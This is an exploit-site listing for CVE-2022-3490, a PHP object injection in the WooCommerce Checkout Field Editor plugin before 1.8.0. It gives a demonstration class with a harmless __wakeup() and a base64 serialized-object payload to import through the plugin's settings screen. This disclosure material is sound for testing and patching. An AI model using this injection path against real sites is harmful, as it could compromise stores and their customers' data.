Exploit for Checkout Field Editor for WooCommerce < 1.8.0 - Admin+ PHP Object Injection CVE-2022-3490

Name: Exploit for Checkout Field Editor for WooCommerce < 1.8.0 - Admin+ PHP Object Injection CVE-2022-3490
Rating: 5 (107 reviews)

2022-11-07 | CVSS 1.1

## https://sploitus.com/exploit?id=WPEX-ID:0C9F22E0-1D46-4957-9BA5-5CCA78861136
To simulate a gadget chain, put the following code in a plugin

class Evil {
  public function __wakeup() : void {
    die("Arbitrary deserialization");
  }
}

Then import the following payload via WooCommerce > Checkout Form > Advanced Settings > Backup and Import Settings: Tzo0OiJFdmlsIjowOnt9Ow==

Tzo0OiJFdmlsIjowOnt9Ow== being the base64 encode of serialized object: O:4:"Evil":0:{};